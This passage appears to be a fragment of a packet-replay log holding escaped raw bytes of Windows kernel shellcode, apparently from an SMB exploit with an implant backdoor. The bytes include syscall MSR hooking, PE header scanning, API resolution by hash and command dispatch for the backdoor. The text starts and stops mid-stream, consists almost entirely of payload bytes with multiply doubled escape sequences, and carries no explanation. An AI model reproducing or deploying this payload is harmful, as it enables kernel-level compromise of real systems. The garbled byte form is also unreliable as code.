xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\
\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\
\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 21, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\
\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00
\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea 
\\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\
x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR
\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\
x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\